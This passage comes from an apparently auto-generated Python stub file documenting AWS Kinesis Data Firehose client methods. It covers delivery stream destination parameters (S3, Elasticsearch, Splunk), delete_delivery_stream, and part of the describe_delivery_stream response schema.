ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
S3BackupMode (string) --The Amazon S3 backup mode.
S3BackupConfiguration (dict) --The configuration for backup in Amazon S3.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ElasticsearchDestinationConfiguration (dict) -- The destination in Amazon ES. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .
DomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Specify either ClusterEndpoint or DomainARN .
ClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.
IndexName (string) -- [REQUIRED]The Elasticsearch index name.
TypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during run time.
For Elasticsearch 7.x, don\'t specify a TypeName .
IndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to the IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . The default value is OneDay .
BufferingHints (dict) --The buffering options. If no value is specified, the default values for ElasticsearchBufferingHints are used.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).
SizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).
DurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.
S3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When it is set to FailedDocumentsOnly , Kinesis Data Firehose writes any documents that could not be indexed to the configured Amazon S3 destination, with elasticsearch-failed/ appended to the key prefix. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents with elasticsearch-failed/ appended to the prefix. For more information, see Amazon S3 Backup for the Amazon ES Destination . Default value is FailedDocumentsOnly .
S3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
VpcConfiguration (dict) --The details of the VPC of the Amazon ES destination.
SubnetIds (list) -- [REQUIRED]The IDs of the subnets that you want Kinesis Data Firehose to use to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.
The number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.
(string) --
RoleARN (string) -- [REQUIRED]The ARN of the IAM role that you want the delivery stream to use to create endpoints in the destination VPC.
SecurityGroupIds (list) -- [REQUIRED]The IDs of the security groups that you want Kinesis Data Firehose to use when it creates ENIs in the VPC of the Amazon ES destination.
(string) --
SplunkDestinationConfiguration (dict) -- The destination in Splunk. You can specify only one destination.
HECEndpoint (string) -- [REQUIRED]The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.
HECEndpointType (string) -- [REQUIRED]This type can be either "Raw" or "Event."
HECToken (string) -- [REQUIRED]This is a GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.
HECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk, or if it doesn\'t receive an acknowledgment of receipt from Splunk.
DurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.
S3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .
S3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
Tags (list) -- A set of tags to assign to the delivery stream. A tag is a key-value pair that you can define and assign to AWS resources. Tags are metadata. For example, you can add friendly names and descriptions or other types of information that can help you distinguish the delivery stream. For more information about tags, see Using Cost Allocation Tags in the AWS Billing and Cost Management User Guide.
You can specify up to 50 tags when creating a delivery stream.
(dict) --Metadata that you can assign to a delivery stream, consisting of a key-value pair.
Key (string) -- [REQUIRED]A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
Value (string) --An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
"""
pass
def delete_delivery_stream(DeliveryStreamName=None, AllowForceDelete=None):
"""
Deletes a delivery stream and its data.
To check the state of a delivery stream, use DescribeDeliveryStream . You can delete a delivery stream only if it is in one of the following states: ACTIVE , DELETING , CREATING_FAILED , or DELETING_FAILED . You can\'t delete a delivery stream that is in the CREATING state. While the deletion request is in process, the delivery stream is in the DELETING state.
While the delivery stream is in the DELETING state, the service might continue to accept records, but it doesn\'t make any guarantees with respect to delivering the data. Therefore, as a best practice, first stop any applications that are sending records before you delete a delivery stream.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_delivery_stream(
DeliveryStreamName='string',
AllowForceDelete=True|False
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type AllowForceDelete: boolean
:param AllowForceDelete: Set this to true if you want to delete the delivery stream even if Kinesis Data Firehose is unable to retire the grant for the CMK. Kinesis Data Firehose might be unable to retire the grant due to a customer error, such as when the CMK or the grant are in an invalid state. If you force deletion, you can then use the RevokeGrant operation to revoke the grant you gave to Kinesis Data Firehose. If a failure to retire the grant happens due to an AWS KMS issue, Kinesis Data Firehose keeps retrying the delete operation.\nThe default value is false.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.ResourceNotFoundException
:return: {}
:returns:
(dict) --
"""
pass
def describe_delivery_stream(DeliveryStreamName=None, Limit=None, ExclusiveStartDestinationId=None):
"""
Describes the specified delivery stream and its status. For example, after your delivery stream is created, call DescribeDeliveryStream to see whether the delivery stream is ACTIVE and therefore ready for data to be sent to it.
If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it. If the status is DELETING_FAILED , you can force deletion by invoking DeleteDeliveryStream again but with DeleteDeliveryStreamInput$AllowForceDelete set to true.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_delivery_stream(
DeliveryStreamName='string',
Limit=123,
ExclusiveStartDestinationId='string'
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type Limit: integer
:param Limit: The limit on the number of destinations to return. You can have one destination per delivery stream.
:type ExclusiveStartDestinationId: string
:param ExclusiveStartDestinationId: The ID of the destination to start returning the destination information. Kinesis Data Firehose supports one destination per delivery stream.
:rtype: dict
ReturnsResponse Syntax
{
'DeliveryStreamDescription': {
'DeliveryStreamName': 'string',
'DeliveryStreamARN': 'string',
'DeliveryStreamStatus': 'CREATING'|'CREATING_FAILED'|'DELETING'|'DELETING_FAILED'|'ACTIVE',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
},
'DeliveryStreamEncryptionConfiguration': {
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK',
'Status': 'ENABLED'|'ENABLING'|'ENABLING_FAILED'|'DISABLED'|'DISABLING'|'DISABLING_FAILED',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
}
},
'DeliveryStreamType': 'DirectPut'|'KinesisStreamAsSource',
'VersionId': 'string',
'CreateTimestamp': datetime(2015, 1, 1),
'LastUpdateTimestamp': datetime(2015, 1, 1),
'Source': {
'KinesisStreamSourceDescription': {
'KinesisStreamARN': 'string',
'RoleARN': 'string',
'DeliveryStartTimestamp': datetime(2015, 1, 1)
}
},
'Destinations': [
{
'DestinationId': 'string',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ExtendedS3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
'RedshiftDestinationDescription': {
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ElasticsearchDestinationDescription': {
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfigurationDescription': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
],
'VpcId': 'string'
}
},
'SplunkDestinationDescription': {
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
},
],
'HasMoreDestinations': True|False
}
}
Response Structure
(dict) --
DeliveryStreamDescription (dict) --
Information about the delivery stream.
DeliveryStreamName (string) --
The name of the delivery stream.
DeliveryStreamARN (string) --
The Amazon Resource Name (ARN) of the delivery stream. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
DeliveryStreamStatus (string) --
The status of the delivery stream. If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it.
FailureDescription (dict) --
Provides details in case one of the following operations fails due to an error related to KMS: CreateDeliveryStream , DeleteDeliveryStream , StartDeliveryStreamEncryption , StopDeliveryStreamEncryption .
Type (string) --
The type of error that caused the failure.
Details (string) --
A message providing details about the error that caused the failure.
DeliveryStreamEncryptionConfiguration (dict) --
Indicates the server-side encryption (SSE) status for the delivery stream.
KeyARN (string) --
If KeyType is CUSTOMER_MANAGED_CMK , this field contains the ARN of the customer managed CMK. If KeyType is AWS_OWNED_CMK , DeliveryStreamEncryptionConfiguration doesn\'t contain a value for KeyARN .
KeyType (string) --
Indicates the type of customer master key (CMK) that is used for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) .
Status (string) --
